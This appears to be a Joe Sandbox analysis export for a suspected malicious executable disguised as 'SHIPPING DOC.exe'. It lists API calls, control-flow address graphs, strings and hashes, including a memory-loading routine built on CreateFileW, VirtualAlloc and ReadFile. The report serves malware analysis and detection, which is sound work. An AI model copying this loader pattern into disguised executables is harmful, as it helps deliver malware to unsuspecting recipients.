                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc
                                                                                                                      • String ID: Default
                                                                                                                      • API String ID: 1579825452-753088835
                                                                                                                      • Opcode ID: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                                                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                      • Opcode Fuzzy Hash: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                                                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                      • String ID: AU3!$EA06
                                                                                                                      • API String ID: 1268643489-2658333250
                                                                                                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2017 4011af 2010->2017 2011->2009 2012->2001 2014 401225-42b06d call 468b0e 2012->2014 2018 401163-401166 2013->2018 2019 42b01d-42b024 2013->2019 2014->2009 2017->2001 2025 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2017->2025 2026 4011db-401202 SetTimer RegisterWindowMessageW 2017->2026 2020 42afe9-42b018 call 40f190 call 401a50 2018->2020 2021 40116c-401172 2018->2021 2019->2000 2027 42b02a-42b033 call 4370f4 2019->2027 2020->2000 2021->2001 2028 401174-42afde call 45fd57 2021->2028 2026->2009 2033 401204-401216 CreatePopupMenu 2026->2033 2027->2000 2028->2000 2045 42afe4 2028->2045 2045->2009
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                      • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                      • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                      • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                      • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                      • String ID: ,*H$4*H$@fI
                                                                                                                      • API String ID: 615853336-1459471987
                                                                                                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 2065 3cf17a0-3cf184e call 3cef180 2068 3cf1855-3cf187b call 3cf26b0 CreateFileW 2065->2068 2071 3cf187d 2068->2071 2072 3cf1882-3cf1892 2068->2072 2073 3cf19cd-3cf19d1 2071->2073 2077 3cf1899-3cf18b3 VirtualAlloc 2072->2077 2078 3cf1894 2072->2078 2075 3cf1a13-3cf1a16 2073->2075 2076 3cf19d3-3cf19d7 2073->2076 2079 3cf1a19-3cf1a20 2075->2079 2080 3cf19d9-3cf19dc 2076->2080 2081 3cf19e3-3cf19e7 2076->2081 2082 3cf18ba-3cf18d1 ReadFile 2077->2082 2083 3cf18b5 2077->2083 2078->2073 2084 3cf1a75-3cf1a8a 2079->2084 2085 3cf1a22-3cf1a2d 2079->2085 2080->2081 2086 3cf19e9-3cf19f3 2081->2086 2087 3cf19f7-3cf19fb 2081->2087 2092 3cf18d8-3cf1918 VirtualAlloc 2082->2092 2093 3cf18d3 2082->2093 2083->2073 2088 3cf1a8c-3cf1a97 VirtualFree 2084->2088 2089 3cf1a9a-3cf1aa2 2084->2089 2094 3cf1a2f 2085->2094 2095 3cf1a31-3cf1a3d 2085->2095 2086->2087 2090 3cf19fd-3cf1a07 2087->2090 2091 3cf1a0b 2087->2091 2088->2089 2090->2091 2091->2075 2096 3cf191f-3cf193a call 3cf2900 2092->2096 2097 3cf191a 2092->2097 2093->2073 2094->2084 2098 3cf1a3f-3cf1a4f 2095->2098 2099 3cf1a51-3cf1a5d 2095->2099 2105 3cf1945-3cf194f 2096->2105 2097->2073 2101 3cf1a73 2098->2101 2102 3cf1a5f-3cf1a68 2099->2102 2103 3cf1a6a-3cf1a70 2099->2103 2101->2079 2102->2101 2103->2101 2106 3cf1982-3cf1996 call 3cf2710 2105->2106 2107 3cf1951-3cf1980 call 3cf2900 2105->2107 2113 3cf199a-3cf199e 2106->2113 2114 3cf1998 2106->2114 2107->2105 2115 3cf19aa-3cf19ae 2113->2115 2116 3cf19a0-3cf19a4 CloseHandle 2113->2116 2114->2073 2117 3cf19be-3cf19c7 2115->2117 2118 3cf19b0-3cf19bb VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03CF1871
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03CF1A97
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction ID: 191c9e53ee7c481fae40fea39339a08e747831beda6c6e26a3d85d935fc90651
                                                                                                                      • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction Fuzzy Hash: 34A1E574E00209EFDB54CFA4C994BEEBBB5BF48304F248599E605FB280D7759A81CB94

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                                                                                      APIs
                                                                                                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                      • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                      • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                      • String ID: C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                      • API String ID: 3170942423-2072681090
                                                                                                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2150 4012c5-4012cb 2146->2150 2151 42733f-427346 2146->2151 2148 4272f4-427315 Shell_NotifyIconW 2147->2148 2149 42731a-42733a Shell_NotifyIconW 2147->2149 2148->2144 2149->2144 2150->2144 2154 427393-4273b4 Shell_NotifyIconW 2150->2154 2152 427348-427369 Shell_NotifyIconW 2151->2152 2153 42736e-42738e Shell_NotifyIconW 2151->2153 2152->2144 2153->2144 2154->2144
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3300667738-0
                                                                                                                      • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                      • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                      • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                                                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                      • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                                                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 03CF1420: Sleep.KERNELBASE(000001F4), ref: 03CF1431
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03CF1692
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: Y0KEB7TQYSDZQN6H8W3WKMSFDL6IMW
                                                                                                                      • API String ID: 2694422964-1111106351
                                                                                                                      • Opcode ID: 77bee849cb5358426fb8f00129445e7cb25c21f4f247049fc439409704c035fb
                                                                                                                      • Instruction ID: a2b0b36df2d6816e43b4dfbf1f17e0b0156c154de762b83167ec3e8eb0b6f27d
                                                                                                                      • Opcode Fuzzy Hash: 77bee849cb5358426fb8f00129445e7cb25c21f4f247049fc439409704c035fb
                                                                                                                      • Instruction Fuzzy Hash: C6616330D04288DAEF11DBA4D844BEFBBB5AF15304F044199E658BB2C1D7BA4B45CB66
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
